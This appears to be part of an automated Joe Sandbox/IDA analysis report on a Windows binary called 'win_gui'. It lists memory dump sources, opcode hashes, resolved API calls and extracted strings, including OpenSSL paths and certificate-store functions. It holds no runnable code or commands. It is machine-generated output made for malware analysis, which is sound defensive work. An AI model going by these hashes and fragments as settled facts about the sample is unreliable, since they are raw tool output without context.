                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 56c27273f0a0acaac601094102fb0712765da23c36d884367f0e8ae2bb553344
                                  • Instruction ID: 2697468b6452028f1feef4d6bb825d190e6c407dd8f50228c69289052a7b657b
                                  • Opcode Fuzzy Hash: 56c27273f0a0acaac601094102fb0712765da23c36d884367f0e8ae2bb553344
                                  • Instruction Fuzzy Hash: C2515A305086D08FC7A4DF59EC50676BFA2AB4B30170C995EE6E6472A1C239F626DF50
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c02080602239806853ec544895e4594e1c333f232715c352d32e7f462122f3e9
                                  • Instruction ID: c7d0bbc2420db1f8b08835649b6d68e9254e9b561248e377a61697dce34f2fb5
                                  • Opcode Fuzzy Hash: c02080602239806853ec544895e4594e1c333f232715c352d32e7f462122f3e9
                                  • Instruction Fuzzy Hash: E8414F612192C69FC31E8E6D48805AAFF646F66100B4C86DEECC4EF387C514D6A9C7F6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 792cec11db09a35a6c7ddf654e7c7fe338ab194af9c5202848baf8b86677595e
                                  • Instruction ID: ee70fc6aea59d848dd41e04453c6e8353205549ca69bd08fa0f8a31d08b67eac
                                  • Opcode Fuzzy Hash: 792cec11db09a35a6c7ddf654e7c7fe338ab194af9c5202848baf8b86677595e
                                  • Instruction Fuzzy Hash: AD4184612092D29EC30A8E6D48915A6FF64AF67100B4C86CEE8859F747C114D6A5C7F6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 54be8d63dcb36c630541592143ae4417186bd5017863cb0d88096e15250925c9
                                  • Instruction ID: cdde7ea9bcd7c0172f81bea178ddf8a9f300c562073cb4918675ab37b0cfafd1
                                  • Opcode Fuzzy Hash: 54be8d63dcb36c630541592143ae4417186bd5017863cb0d88096e15250925c9
                                  • Instruction Fuzzy Hash: 454114756083418FC344DF29C8859ABFBE5FBC8304F844A6EF89997341D630EA48CB96
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c9474dcce882304f32ea07bd2838137c8eadf43b797c80090b573d6ffe5cc27
                                  • Instruction ID: a01a830c2e6108cbd89664ef8dcfa592ee2925def098b8734056919868b8bd09
                                  • Opcode Fuzzy Hash: 9c9474dcce882304f32ea07bd2838137c8eadf43b797c80090b573d6ffe5cc27
                                  • Instruction Fuzzy Hash: EE41F5756093418FC340CF28C48099BFBE5FB88318F844A6EF89997342D635EA45CB92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 440d18c16333a99b9ec3fe1f75711f6f2e0e947683d5bcb171abfb4938a70a0a
                                  • Instruction ID: f36de8a47dd143e1ae297238e8ddf35500cf8c45eef56737b7715e51bf7c9abb
                                  • Opcode Fuzzy Hash: 440d18c16333a99b9ec3fe1f75711f6f2e0e947683d5bcb171abfb4938a70a0a
                                  • Instruction Fuzzy Hash: 543197612093C29EC30A8E6D48806A6FF65AF66200B4C87CEE8C5DF787C114D5A9C7F6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b324f41b0e88b4e5bcc5b91a53d7904975d1ffdaca40da9d1db4c34f85686ea8
                                  • Instruction ID: b9360e3e761f0bbe232bc0ff96d258a3de13d563f59f1525c1777f4aa6cf22c7
                                  • Opcode Fuzzy Hash: b324f41b0e88b4e5bcc5b91a53d7904975d1ffdaca40da9d1db4c34f85686ea8
                                  • Instruction Fuzzy Hash: 732160327745310BE398E5798C0672BA2D2DBC8660B09C739F655D72C1E968E923D3C4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0e3f04b7259fe156f6e13b5ad01198d957c11438166dba12698731ef2e7f4b09
                                  • Instruction ID: 3a3c3b3d8218e622374110263fd2170c3c5c1ac6534f66c68b39903b4aeaf32b
                                  • Opcode Fuzzy Hash: 0e3f04b7259fe156f6e13b5ad01198d957c11438166dba12698731ef2e7f4b09
                                  • Instruction Fuzzy Hash: 7721903277043107E398E5398C0672BA2D3DBC8A60B09C739F655D72C1E968E922C3C0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c57dcdfe87d4dd341c7486ddfa075be9a139a0380bf08aa7d9ce5fa8b861033
                                  • Instruction ID: 54049583a3b007c2e3561b3af22986ffd2e011a675e91a433e55946f4ed5a7e7
                                  • Opcode Fuzzy Hash: 6c57dcdfe87d4dd341c7486ddfa075be9a139a0380bf08aa7d9ce5fa8b861033
                                  • Instruction Fuzzy Hash: 0431E8B56142009FCB44DF28D4C1A5AB7E5FF8C314F85496AEC89DB356DB30E944CBA2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3f100d455a4950e46668d173c2b18554874aec3c12782ca5a9d9a56762644e5c
                                  • Instruction ID: 2c553241d28bdec1562a0c3032994ba10bfc9b68a72aee37171e128284603955
                                  • Opcode Fuzzy Hash: 3f100d455a4950e46668d173c2b18554874aec3c12782ca5a9d9a56762644e5c
                                  • Instruction Fuzzy Hash: A811A2311057C647C3318E6AC84465BBFF5EF86320F080B6ED5D646643DB25E60DC751
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ba98cb3dc6131dff6eb5b8ff3e6688a60479c58a9f8825fee670c053c8cfed1d
                                  • Instruction ID: b6e7b16fabcd9eb1b6e7017915497d99d83ef0d2b7d0f7eef28577595253d313
                                  • Opcode Fuzzy Hash: ba98cb3dc6131dff6eb5b8ff3e6688a60479c58a9f8825fee670c053c8cfed1d
                                  • Instruction Fuzzy Hash: 5511DB66E3007009C7080ABE6C50633FB929FC262735B85A7EDD4EF0C2C164DD1096E0
                                  APIs
                                  • DeleteCriticalSection.KERNEL32(006D9828), ref: 005C704C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CriticalDeleteSection
                                  • String ID: !$#$#$#$#$#$'$($*$-$.$/$/$/$0$1$4$4$5$6$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F
                                  • API String ID: 166494926-449599406
                                  • Opcode ID: 1ceaf77dd842367c45a0df6c7e936f3c4d8d396b7277c647802098d35d25b2bc
                                  • Instruction ID: 353cceaa6ca14f32f6e8aadb58164601263504bc946102580d9e14760d583407
                                  • Opcode Fuzzy Hash: 1ceaf77dd842367c45a0df6c7e936f3c4d8d396b7277c647802098d35d25b2bc
                                  • Instruction Fuzzy Hash: F9417350D092C9D9EB02D6A8D65C7DEBFB11F27308F085099C5843A282E6FF0609D77B
                                  APIs
                                    • Part of subcall function 005D1A97: EnterCriticalSection.KERNEL32(006DA3EC,?,00000000,?,005C67AA), ref: 005D1B01
                                    • Part of subcall function 005D1A97: KiUserCallbackDispatcher.NTDLL(00010456,00000001), ref: 005D1B09
                                    • Part of subcall function 005D1A97: LeaveCriticalSection.KERNEL32(006DA3EC,?,00000000,?,005C67AA), ref: 005D1B10
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005C8631
                                  • CloseHandle.KERNEL32(00000000,?,000000FF), ref: 005C863F
                                  Strings
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CriticalSection$CallbackCloseDispatcherEnterHandleLeaveObjectSingleUserWait
                                  • String ID: "$"$"$%$'THWC$+$-$/$L$L$L$L$L$L$L$L$L$L$T'S'H'W'W'B'C''$}$}$}$}$}$}$}$}$}$}
                                  • API String ID: 3949274620-4191246222
                                  • Opcode ID: bcc73433e38be2733c5a501d7edec34d9f8bba7011db472e539727b8bf055bdc
                                  • Instruction ID: 25a3098b39cd9745d2b505f96aebdff786f218c1ed7aa0f70d93ba5e8d07316b
                                  • Opcode Fuzzy Hash: bcc73433e38be2733c5a501d7edec34d9f8bba7011db472e539727b8bf055bdc
                                  • Instruction Fuzzy Hash: 64616320D0D2C9DDEB12CBE8D448BDEBFB16F66308F18509DD5942B382C6BA4509C776
                                  APIs
                                  • ___from_strstr_to_strchr.LIBCMT ref: 0062556A
                                  • ___from_strstr_to_strchr.LIBCMT ref: 006255E0
                                  Strings
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ___from_strstr_to_strchr
                                  • String ID: , name=$, value=$..\..\openssl-1.1.0f\crypto\engine\eng_cnf.c$EMPTY$LIST_ADD$LOAD$SO_PATH$default_algorithms$dynamic$dynamic_path$engine_id$init$section=$soft_load
                                  • API String ID: 601868998-4150970591
                                  Similarity
                                  • API ID: _strspn
                                  • String ID: $ $ ,$..\..\openssl-1.1.0f\crypto\pem\pem_lib.c$DEK-Info:$ENCRYPTED$Proc-Type:
                                  • API String ID: 3684824311-3201255450
                                  APIs
                                  • GetStdHandle.KERNEL32(000000F6,00000000,?,?,?,?,006606C1,?,?,00000000,00000001), ref: 0066094C
                                  • SetConsoleMode.KERNEL32(00000000,?,?,?,006606C1,?,?,00000000,00000001), ref: 0066094F
                                  • GetEnvironmentVariableW.KERNEL32(OPENSSL_WIN32_UTF8,00000000,00000000,?), ref: 00660979
                                  • GetStdHandle.KERNEL32(000000F6,?,000001FF,?,00000000), ref: 0066099D
                                  • ReadConsoleW.KERNEL32(00000000), ref: 006609A0
                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000200,00000200,00000000,00000000), ref: 00660A12
                                  • GetStdHandle.KERNEL32(000000F6,000001FF,000001FF,?,00000000), ref: 00660A41
                                  • ReadConsoleA.KERNEL32(00000000), ref: 00660A44
                                  • ___from_strstr_to_strchr.LIBCMT ref: 00660AD2
                                  • GetStdHandle.KERNEL32(000000F6,00000000,?,?,00000000,00000001), ref: 00660B65
                                  • SetConsoleMode.KERNEL32(00000000), ref: 00660B68
                                  Similarity
                                  • API ID: ConsoleHandle$ModeRead$ByteCharEnvironmentMultiVariableWide___from_strstr_to_strchr
                                  • String ID: OPENSSL_WIN32_UTF8
                                  • API String ID: 2229543266-1166498146
                                  APIs
                                  • EnterCriticalSection.KERNEL32(012FFC04,00000000,006D9874,006D9A1C,?,?,?,005C816D,0000000A), ref: 005C728D
                                  • lstrcmpW.KERNEL32(?,00000005,?,?,?,005C816D,0000000A), ref: 005C72D4
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • lstrlenW.KERNEL32(?,?,?,?,005C816D,0000000A), ref: 005C7313
                                  • lstrcpyW.KERNEL32(00000000,006CAB48,?,?,?,005C816D,0000000A), ref: 005C7393
                                  • lstrcatW.KERNEL32(00000000,?,?,?,?,005C816D,0000000A), ref: 005C739D
                                  • EnterCriticalSection.KERNEL32(?,?,?,?,005C816D,0000000A), ref: 005C73A4
                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,005C816D,0000000A), ref: 005C73BF
                                  • LeaveCriticalSection.KERNEL32(012FFC04,?,?,?,005C816D,0000000A), ref: 005C73E7
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                  • String ID: 1m1mRm1mm$2$C$m
                                  • API String ID: 2137583188-2970559342
                                  APIs
                                  • ___free_lconv_mon.LIBCMT ref: 006776B8
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676F24
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676F36
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676F48
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676F5A
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676F6C
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676F7E
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676F90
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676FA2
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676FB4
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676FC6
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676FD8
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676FEA
                                    • Part of subcall function 00676F07: _free.LIBCMT ref: 00676FFC
                                  • _free.LIBCMT ref: 006776AD
                                    • Part of subcall function 00675155: HeapFree.KERNEL32(00000000,00000000,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80), ref: 0067516B
                                    • Part of subcall function 00675155: GetLastError.KERNEL32(00674E80,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80,00674E80), ref: 0067517D
                                  • _free.LIBCMT ref: 006776CF
                                  • _free.LIBCMT ref: 006776E4
                                  • _free.LIBCMT ref: 006776EF
                                  • _free.LIBCMT ref: 00677711
                                  • _free.LIBCMT ref: 00677724
                                  • _free.LIBCMT ref: 00677732
                                  • _free.LIBCMT ref: 0067773D
                                  • _free.LIBCMT ref: 00677775
                                  • _free.LIBCMT ref: 0067777C
                                  • _free.LIBCMT ref: 00677799
                                  • _free.LIBCMT ref: 006777B1
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                  • String ID:
                                  • API String ID: 161543041-0
                                  Similarity
                                  • API ID:
                                  • String ID: ,name:$,value:$..\..\openssl-1.1.0f\crypto\x509v3\v3_asid.c$0123456789$RDI$inherit$section:
                                  • API String ID: 0-3320458363
                                  APIs
                                  • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 005F00B7
                                  • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000,?), ref: 005F00E8
                                  • CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000,?), ref: 005F011B
                                  • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 005F01A6
                                  • CertFindCertificateInStore.CRYPT32(?,00000001,00000000,00070007,?,00000000), ref: 005F0258
                                  Similarity
                                  • API ID: Cert$CertificateStore$CertificatesContextEnumProperty$Find
                                  • String ID: %lX$..\..\openssl-1.1.0f\engines\e_capi.c$Error code= 0x$capi_cert_get_fname
                                  • API String ID: 3601032570-1657576467
                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,-00000002,00000000,00000000,?,005CA9C8,00000000), ref: 005CAA0C
                                  • ReadFile.KERNEL32(00000000,?,00000003,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,-00000002,00000000,00000000), ref: 005CAA2E
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000,-00000002,00000000,00000000,?,005CA9C8), ref: 005CAA64
                                  • ReadFile.KERNEL32(00000000,?,00020000,?,00000000,005CA9C8,00000000), ref: 005CAA8C
                                  • CloseHandle.KERNEL32(00000000,?,00020000,?,00000000,005CA9C8,00000000), ref: 005CAA8F
                                  • MultiByteToWideChar.KERNEL32(005CA9C8,00000000,?,000000FF,00000000,00000000,?,00020000,?,00000000,005CA9C8,00000000), ref: 005CAAD7
                                  • MultiByteToWideChar.KERNEL32(005CA9C8,00000000,?,000000FF,?,00000000,?,00020000,?,00000000,005CA9C8,00000000), ref: 005CAAEF
                                  • lstrlenA.KERNEL32(?,?,00020000,?,00000000,005CA9C8,00000000), ref: 005CABAD
                                  Similarity
                                  • API ID: File$ByteCharMultiReadWide$CloseCreateHandlePointerlstrlen
                                  • String ID: ;
                                  • API String ID: 1836498745-1661535913
                                  APIs
                                  • GetFileType.KERNEL32 ref: 005E9859
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 005E98B2
                                  • RegisterEventSourceW.ADVAPI32(00000000,OpenSSL), ref: 005E99AE
                                  • ReportEventW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 005E99DC
                                  • DeregisterEventSource.ADVAPI32(00000000), ref: 005E99E3
                                  Similarity
                                  • API ID: Event$FileSource$DeregisterRegisterReportTypeWrite
                                  • String ID: OpenSSL$OpenSSL: FATAL$no stack?
                                  • API String ID: 21571476-278800372
                                  APIs
                                    • Part of subcall function 005F1AD0: CertOpenStore.CRYPT32(00000009,00000000,00000000,?,?), ref: 005F1B19
                                    • Part of subcall function 005F1AD0: GetLastError.KERNEL32 ref: 005F1B4F
                                  • CertCloseStore.CRYPT32(00000000,00000000), ref: 005F1256
                                  Similarity
                                  • API ID: CertStore$CloseErrorLastOpen
                                  • String ID: Certificate %d$Listing certs for store %s$xXi
                                  • API String ID: 3847701492-2116776345
                                  APIs
                                  • _free.LIBCMT ref: 00674CBC
                                    • Part of subcall function 00675155: HeapFree.KERNEL32(00000000,00000000,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80), ref: 0067516B
                                    • Part of subcall function 00675155: GetLastError.KERNEL32(00674E80,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80,00674E80), ref: 0067517D
                                  • _free.LIBCMT ref: 00674CC8
                                  • _free.LIBCMT ref: 00674CD3
                                  • _free.LIBCMT ref: 00674CDE
                                  • _free.LIBCMT ref: 00674CE9
                                  • _free.LIBCMT ref: 00674CF4
                                  • _free.LIBCMT ref: 00674CFF
                                  • _free.LIBCMT ref: 00674D0A
                                  • _free.LIBCMT ref: 00674D15
                                  • _free.LIBCMT ref: 00674D23
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
